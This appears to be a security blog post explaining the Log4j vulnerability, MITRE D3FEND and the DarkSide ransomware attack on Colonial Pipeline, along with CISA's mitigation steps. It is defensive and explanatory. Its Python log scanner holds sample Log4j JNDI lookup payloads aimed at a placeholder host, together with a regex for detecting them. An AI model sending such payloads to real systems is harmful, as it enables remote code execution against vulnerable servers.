What is the Log4j Vulnerability?

Log4j is a widely used logging library for applications written in the Java programming language. It records what happens while a Java program runs. NPR spoke to Andrew Morris, founder and CEO of cyber intelligence firm GreyNoise, who described Log4j as “…a modular component that's used in many, many different kinds of software. And its job is... just basically recording things that happened and writing them to another computer somewhere else.” In December of 2021, Log4j was found to be vulnerable to remote code execution.

Put more simply, the vulnerability in this logging library allows attackers to take control of remote devices running Java software. This represents a severe security risk. Gadgets 360 quotes Amit Yoran, chief executive of Tenable, a network security firm, and the founding director of the US Computer Emergency Readiness Team: "the Apache Log4j Remote Code Execution Vulnerability is the single biggest, most critical vulnerability of the last decade."

One of the most popular programs affected by this vulnerability is Minecraft. John Hammond, a noted cybersecurity researcher, recently posted a video showing how Log4j could be exploited in Minecraft, allowing a remote user to launch the calculator application on another system (proving that any other program or command could also be run). Tech Times posted an article detailing how Minecraft users can defend against this threat.

Unfortunately, Minecraft is not the only vulnerable software. Speaking to CNET, Nadir Izrael (CTO and co-founder of IoT security company Armis) said that “generally speaking, any consumer device that uses a web server could be running Apache. Apache is widely used in devices like smart TVs, DVR systems and security cameras. Think about how many of these devices are sitting in loading docks or warehouses, unconnected to the internet, and unable to receive security updates. The day they're unboxed and connected, they're immediately vulnerable to attack."

To mitigate this threat, users should continue to install all security patches and updates as soon as possible. As companies roll out patches to this vulnerability, it is important to stay on top of those updates!
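As an added defensive example (not code from the original post): the attack string that triggers the December 2021 Log4j bug uses Log4j's own "${jndi:...}" lookup syntax, so a simple first check is to scan logs of untrusted input for it. The log lines and hosts below are constructed for the example.

```python
import re

# Constructed sample log lines (not from the original post): one normal
# request and two requests carrying a Log4j "${jndi:...}" lookup string,
# which Log4j evaluates when the line is logged.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:13:00:01] "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:13:00:02] "GET / HTTP/1.1" 200 "${jndi:ldap://example.invalid/a}"',
    '10.0.0.7 - - [10/Dec/2021:13:00:03] "GET /search?q=${jndi:rmi://example.invalid/b} HTTP/1.1" 404 "curl/7.79"',
]

# Matches the plain form of the lookup and captures the JNDI scheme (ldap, rmi, ...).
# Any occurrence in a URL, User-Agent or other attacker-controlled field is worth an alert.
JNDI_LOOKUP = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+):", re.IGNORECASE)


def find_jndi_lookups(lines):
    """Return (line_number, scheme, matched_text) for every line containing a lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = JNDI_LOOKUP.search(line)
        if match:
            hits.append((number, match.group("scheme").lower(), match.group(0)))
    return hits


def summarize(lines):
    """Counts and distinct schemes, the numbers a SOC dashboard would show."""
    hits = find_jndi_lookups(lines)
    return {
        "total": len(lines),
        "flagged": len(hits),
        "schemes": sorted({scheme for _, scheme, _ in hits}),
    }


if __name__ == "__main__":
    for number, scheme, text in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {number}: {scheme} lookup {text!r}")
    print(summarize(SAMPLE_LOG))
```

This catches only the plain form of the lookup; it is a triage aid, not a substitute for patching.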

MITRE D3FEND Explained

The MITRE D3FEND Knowledge Graph lists common cybersecurity countermeasures.

On June 22, 2021, the National Security Agency Cybersecurity division released details of a new project called D3FEND. “D3FEND, a MITRE research project funded by the NSA, improves the #cybersecurity of NSS, DoD, and the DIB by providing defensive countermeasures for common offensive techniques” (NSA Cyber, Twitter).

The MITRE Corporation is a federally funded organization that supports cybersecurity research and development. To better understand this D3FEND release, it is helpful to know about MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge), which was first developed in 2013. “The MITRE ATT&CK framework is a curated knowledge base and model for cyber adversary behavior, reflecting the various phases of an adversary's attack lifecycle and the platforms they are known to target” (McAfee, 2020). This framework allows individuals and organizations to better understand the tactics and techniques used by malicious attackers, and to better prepare for and defend against those attacks.

The 2021 release of MITRE D3FEND is a major tool that blue teams can use to protect against exploitation. This framework will allow cybersecurity professionals to fill the gaps in their coverage by comparing their current setup to the D3FEND framework. “These initial results show good promise, and we believe our research has demonstrated the feasibility of a countermeasure model built from real-world data sources” (MITRE, 2021).

For more information, check out the technical whitepaper released by MITRE here.

DarkSide Pipeline Ransomware Attack

The Colonial Pipeline delivers 45% of the fuel supply used by the eastern coast of the United States. Hackers disrupted it in May 2021 using DarkSide RaaS (Ransomware as a Service).

On May 11, 2021, the Cybersecurity & Infrastructure Security Agency (CISA) published an article describing the DarkSide ransomware attack on the Colonial Pipeline. This pipeline delivers 45% of the fuel supply used by the eastern coast of the United States.

When Colonial learned of the cyber attack, “they proactively disconnected certain OT (operational technology) systems to ensure the systems’ safety” (CISA report). In other words, while only the company’s IT network was hacked, the OT systems were unaffected but still taken offline deliberately by Colonial as a precaution.

What is DarkSide and how did they hack the pipeline?

Social engineering is a common way for attackers to gain access to unauthorized systems.

DarkSide is a hacking group with ties to Russia. They liken themselves to Robin Hood, claiming to steal money from large companies and redistribute it to smaller organizations through charitable donations. “This Robin Hood mentality is more of a PR stunt” according to Jon DiMaggio, chief security strategist for threat intelligence firm Analyst1, interviewed in an article by TechRepublic. "When they made the donations (two donations at $10,000 each), it was reported across cyber news organizations all over the world," DiMaggio said. "It was essentially a $20K marketing cost that got their name out there. All of these guys seem to have big egos, which is why they have press releases and will talk to the media and researchers. So this donation was likely an attempt to increase their visibility."

So how was the attack carried out? “According to open-source reporting, DarkSide actors have previously been observed gaining access through phishing and exploiting remotely accessible accounts and systems and Virtual Desktop Infrastructure (VDI)” (CISA report). A phishing attack is when an attacker pretends to be someone trustworthy and convinces the victim to share login credentials or other vital system information. A VDI is defined as “the hosting of desktop environments on a central server. It is a form of desktop virtualization, as the specific desktop images run within virtual machines (VMs) and are delivered to end clients over a network” (Citrix).

While the exact details of this attack are still under investigation, it is likely that social engineering and unauthorized VDI access were involved at some level.

How to mitigate ransomware attacks

The Colonial Pipeline attack triggered panic, causing long lines and gas shortages across the east coast.

The CISA report lists many steps to take to help prevent ransomware attacks at your organization. Here is an abbreviated version of some of the steps they describe (see the full article for more details):

  • Require multi-factor authentication
  • Enable strong spam filters
  • Implement a user training program
  • Filter network traffic to prohibit malicious IP addresses
  • Update software in a timely manner
  • Limit access to resources over networks
  • Set antivirus/antimalware programs to conduct regular scans
  • Implement unauthorized execution prevention by:
    • Disabling macro scripts from Microsoft Office files
    • Implementing application allowlisting
    • Monitoring and/or blocking inbound connections from Tor
    • Deploying signatures to detect and/or block inbound connections from Cobalt Strike servers
  • Implement and ensure robust network segmentation
  • Organize OT assets into logical zones
  • Identify OT and IT network inter-dependencies and develop workarounds or manual controls
  • Regularly test manual controls
  • Implement regular data backup procedures:
    • Ensure that backups are regularly tested
    • Store your backups separately
    • Maintain regularly updated “gold images” of critical systems
    • Retain backup hardware
    • Store source code or executables
  • Ensure user and process account access rights are given based on the principles of least privilege and separation of duties

For more information on how to defend against ransomware attacks, check out this webcast by John Strand, Owner and Security Analyst at Black Hills Information Security. He explains that there are many simple and free/inexpensive measures that companies can take to protect themselves. The content with John starts at the 29:15 mark and is definitely worth investigating.

Thanks for reading!